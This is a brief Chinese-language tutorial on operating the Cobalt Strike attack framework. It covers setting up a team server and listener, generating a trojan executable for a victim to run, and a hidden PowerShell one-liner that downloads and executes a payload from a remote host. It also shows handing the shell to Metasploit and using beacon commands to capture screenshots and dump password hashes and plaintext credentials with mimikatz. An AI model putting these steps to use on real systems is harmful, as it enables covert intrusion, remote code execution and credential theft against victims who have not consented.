Cobalt Strike 简单使用

允我心安 提交于 2019-12-17 01:24:29

1、运行服务端

其中afanti就是密码
Alt text

2、客户端

用户名随意写,密码添afanti
Alt text

3、创建listener

Alt text

4、生成木马客户端

Attacks->Packages->Windows Executable

选择刚刚生成的listener,生成木马到桌面。
Alt text
双击artifact.exe木马,客户就能上线。

另一种上线方式

Attacks->Packages->Payload Generator

选择一种语言生成payload
Alt text

Attacks->web Drive-by->Scripted Web Delivery

这个模块相当于搭建一个web服务器,将payload放到服务器上让客户端下载执行。
Alt text

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.61.128:80/aaa'))"

通过msf接收shell

在Cobalt Strik中执行,先添加一个监听命令,名称为:msf payload选择:windows/foreign/reverse_tcp 监听端口:4444
Alt text

Alt text
选择刚刚建立的msf_litener
Alt text
msf配置好在交互界面点击spawn就会把shell弹到msf上,shell弹回来
Alt text

beacon模块使用

截屏

运行截图命令
Alt text
在view->screenshot查看
Alt text

抓hash

beacon> sleep 0  //快速显示结果

beacon> wdigest //读取信息

beacon>hashdump   //读取账号hash密码值,需要administer权限,右击受害者主机--access-hashdump

beacon> logonpasswords  //运行mimikatz, 右击受害者主机--access- RUN mimikatz

其他功能参考下面链接。
参考链接:
https://xz.aliyun.com/t/199#toc-2
https://www.freebuf.com/sectool/133369.html
http://baijiahao.baidu.com/s?id=1599321801235492548&wfr=spider&for=pc
下载参考这个链接

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!